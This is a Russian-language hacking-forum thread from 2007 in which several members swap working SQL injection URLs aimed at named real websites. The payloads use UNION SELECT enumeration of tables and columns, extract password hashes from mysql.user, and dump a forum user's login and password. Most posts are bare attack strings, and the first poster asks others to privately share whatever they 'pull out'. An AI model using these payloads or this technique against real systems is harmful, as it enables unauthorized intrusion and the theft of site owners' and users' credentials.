ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
20.01.2007, 04:07
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
сел седня изучать скл-инж, вроде начало получаться, но в итоге логинов/паролей не получил, а так нарыл следующее, может и фигня, хз :
Код:
http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('ForumMessages','DelficsClassPhotoPoints','ForumForums','DelficsClassPhoto','Banners','Articles','ForumSections','NewsVendors','ATI_Sections','ManagerShopPollOtherSources','NewsDelfics','ATI_MBChipset','ProductsTypes','dtproperties','ForumSubscribers','ManagerShopLogins','LinksFamajor','ManagerShopPollSources','ManagerShopPollDay','ManagerShopPollSums','GbSections','NewsBigmir','NewsCompany','MHShops','NewsGB','NewsHifiSections','NewsShop','NewsHifi','ProductsAction','ProductsArticles','ManagerShopPollCustomer','ProductsComputersAction','ProductsDrivers','ProductsCertificatesAccordance','ProductsParameters','ProductsMain','ProductsParametersAccordanceTypes','ProductsParametersVariantValues','ProductsSections','ProductsParametersValues','ProductsTerms','ProductsValues','RacingCardsView','SearchQueries','ShopCustomers','ServiceCenters','ShopCustomersCities','RacingBingo','Racings','ShopCustomersRegions','ShopDeliveryNightExpress','ShopDeliveryVariants','ShopOrders','ShopOrdersComments','ShopOrdersItems','StormTypes','ProductsCertificates','ShopOrderStatuses','ShopProductsOnMain','ShopSessions','ShopPaymentVariants','sysconstraints','Vendors','StormProducts','VotesQuestions','VotesAnswers','syssegments','ShopDeliveryPlaces','RacingCards','VendorsStatuses','ProductsTypesDiscont','MHSaturday','ProductsLinks'))--
и детальные на некоторые
Код:
http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='GbSections'+AND+COLUMN_NAME+NOT+IN+('sectionID','sectionurl','sortorder','parentid','sectioncontent','sectionname'))--
Код:
http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='dtproperties'+AND+COLUMN_NAME+NOT+IN+('id','objectid','property','value','uvalue','lvalue','version'))--
Код:
http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='Articles'+AND+COLUMN_NAME+NOT+IN+('Article_id','Article_Name','File_name','Type_id','Views','ArticleType_id','Vendor_Id','add_date','ProductsSection_Id'))--
если кто-то что-то интересное вытянет, напишите в приват, а то мне учиться надо  |
|
|
20.01.2007, 23:26
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Код:
_http://www.searchmonster.org/index.php?lw=16903+union+select+1,2,3,4,5+from+wsr/*
на столбцы не хватило нервов)) |
|
|
|
21.01.2007, 00:12
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
http://www.gelezo.net/files.php?id=20031030191145'
|
|
|
|
21.01.2007, 00:20
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Сообщение от Sn@k3
http://www.gelezo.net/files.php?id=20031030191145'
хоть столбцы бы подобрал 
Код:
http://www.gelezo.net/files.php?id=-99'+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
|
|
|
|
21.01.2007, 00:33
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
http://www.mtas.ru/second.php?ID=-1+union+select+1/*
icek вот) подобрал)))
|
|
|
|
21.01.2007, 01:39
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
=) ну так))) кстати http://www.rudtp.ru/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8/* дальше не АСИЛИЛ
|
|
|
|
21.01.2007, 13:47
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
Sn@k3
там используется 2 запроса сразу. врятли можно что-то вытащить. попробуй здесь:
http://www.rudtp.ru/download.php?id=-2+or+1=1/*
|
|
|
|
21.01.2007, 17:42
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854
Репутация:
409
|
|
_http://www.uprava.org/section.php?id=225+union+select+1,2,3,4,5,6,0xc7eb feeae020e1fbeb20e7e4e5f1fc203a29/*
|
|
|
|
21.01.2007, 18:33
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854
Репутация:
409
|
|
_http://galagraphics.kz/portfolio.php?id=11+union+select+1,2,3,4,password, 6,7,8,9,10+from+mysql.user/*
хэш тут в SHA-1?
|
|
|
|
21.01.2007, 20:41
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
http://forum.vbios.com/
Сайт: http://forum.vbios.com/
Результат: выполнение SQL команд (нпр. получения пароля пользователя)
Количество пользователей: 11013
URL: http://forum.vbios.com/addons/kit/serverinfo.php?id=-32+union+select+1,2,3,4,5,6,7,8,9,10,null,12,conca t(U_LoginName,%22:%22,U_Password)+from+w3t_Users+w here+U_Name=%22Arafat%22/*
======
Я сдесь не давно, кому помог не сочтите за сложность, поставьте +
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
